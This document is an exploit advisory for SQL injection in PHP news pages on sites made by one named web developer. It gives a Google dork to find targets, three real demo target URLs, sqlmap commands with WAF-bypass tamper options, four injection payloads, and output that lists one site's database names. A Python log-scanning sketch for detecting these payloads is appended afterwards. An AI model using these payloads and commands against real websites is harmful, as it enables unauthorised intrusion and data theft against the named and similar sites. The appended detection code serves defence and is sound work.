# Exploit Title: Website Developed by Irsyadi Siradjuddin SQL Injection
# Google Dork: intext:Developed by Irsyadi Siradjuddin
# Date: 2020.05.05
# Exploit Author: Mr.Gagaltotal666 - gagaltotal.github.io
# Vendor Homepage: https://irsyadi.com/
# Version PHP : PHP 5
# Tested on: BackBox 6 GNU/Linux
# CVE : N/A
PoC:
- www.target.com/berita_detail.php?ID=1[SQLi][']
- www.target.com/beritadtl.php?judul=hlm=1308[SQLi][']
Demo Target:
- https://yapensa.or.id/berita_detail.php?ID=1
- https://www.jasuda.net/beritadtl.php?judul=Potensi,%20Produksi,%20dan%20Prospek%20Rumput%20Laut%20di%20Indonesia&hlm=1308
- https://agrotekuin.com/matakuliah_rps.php?ID=83
PoC sqlmap:
- sqlmap -u "example.com" --dbs
- Bypass WAF : sqlmap -u "example.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=1' AND 1151=1151 AND 'uCJd'='uCJd

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ID=1' AND (SELECT 4748 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT (ELT(4748=4748,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ndfp'='Ndfp

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ID=1' AND (SELECT 5294 FROM (SELECT(SLEEP(5)))PzWV) AND 'VsvN'='VsvN

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: ID=1' UNION ALL SELECT CONCAT(0x7170707a71,0x48485649454161426e6b7a756c524a5342706a644d415252704a6e5a66676d685a6669525142786c,0x71786b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[09:18:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[09:19:00] [INFO] fetching database names
available databases [2]:
[*] h02087_yapensa
[*] information_schema
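
Detection sketch for site operators, added here as an example and not part of the original advisory: it scans web access logs for the four technique families in the sqlmap report above and also flags any non-integer ID value, which still fires when tamper scripts defeat the signatures. The log format, the sample lines, the function names and the assumption that ID is always an integer key are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# One signature per technique family in the sqlmap report above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based (FLOOR)": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # space2comment swaps spaces for /**/
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP; payload shapes follow the report).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/May/2020:09:18:40 +0000] "GET /berita_detail.php?ID=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/May/2020:09:18:41 +0000] "GET /berita_detail.php?ID=1%27%20AND%201151%3D1151%20AND%20%27uCJd%27%3D%27uCJd HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/May/2020:09:18:47 +0000] "GET /berita_detail.php?ID=1%27%20aNd%20(SeLeCt%205294%20FrOm%20(SeLeCt(SlEeP(5)))PzWV)%20AND%20%27VsvN%27%3D%27VsvN HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/May/2020:09:18:48 +0000] "GET /berita_detail.php?ID=1%27/**/UNION/**/ALL/**/SELECT/**/NULL,NULL--%20- HTTP/1.1" 200 5301',
    '198.51.100.7 - - [05/May/2020:09:18:49 +0000] "GET /berita_detail.php?ID=1%27%20AND%201151%20BETWEEN%201151%20AND%201151%20AND%20%27a%27%3D%27a HTTP/1.1" 200 5120',
]

def classify(value):
    """Return the signature names that match one URL-decoded parameter value."""
    text = SQL_COMMENT.sub(" ", value)  # undo comment-for-space substitution
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(lines, int_params=("ID",)):
    """Return (line_no, parameter, labels) for every suspicious parameter."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        request = REQUEST.search(line)
        if not request:
            continue
        query = urlsplit(request.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            labels = classify(value)
            # Assumption: ID is an integer key, so any other value is anomalous
            # even when a rewritten payload matches none of the signatures.
            if key in int_params and not re.fullmatch(r"[0-9]+", value):
                labels.append("non-integer " + key)
            if labels:
                findings.append((line_no, key, labels))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The last sample line matches no signature and is caught only by the integer check, which is why the same allowlist validation belongs in the application in front of the query.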